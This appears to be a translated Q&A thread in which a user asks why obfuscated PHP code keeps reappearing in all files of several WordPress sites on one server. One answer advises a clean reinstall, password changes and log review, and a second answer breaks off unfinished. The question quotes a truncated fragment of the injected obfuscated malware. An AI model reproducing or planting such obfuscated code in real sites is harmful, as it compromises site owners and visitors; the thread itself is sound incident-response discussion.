请帮帮我。
我的所有WordPress网站都在所有php文件中添加了一些奇怪的代码(核心,主题,插件......) 我花了很多时间来删除它,但它一直在回来。我没有安装任何不安全的东西,但我不确定因为我和很多人一起工作所以真的不知道发生了什么事?
奇怪的代码看起来
"<?php $eqrqdvc = '.2`hA x27pd%6<C x27pd%6|6.7eu{66~67<&o! x24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- xssbz)#44ec:649#-!#:618d5f9#-!#f6c68 x24- x24-tusqpt)%z-#:#* ......"
同一台服务器上的所有网站都同时出现这种问题,您认为原因可能是在服务器上还是可能在一个网站上?
答案 0 :(得分:7)
你被黑了。
虽然您正在清理所有这些文件,但您有一个可以反复利用的安全漏洞。
您可以做的最好的事情是备份数据库删除所有内容,然后使用最新的插件执行全新安装。
当然,您需要更改所有密码并监控网站。
如果你想深入了解感染的起源,我建议你开始查看你的日志文件。特别注意POST请求。如果你有足够的历史,你可能会发现一些有趣的东西。
答案 1 :(得分:1)
似乎是病毒,要从wordpress文件中删除此代码,您可以: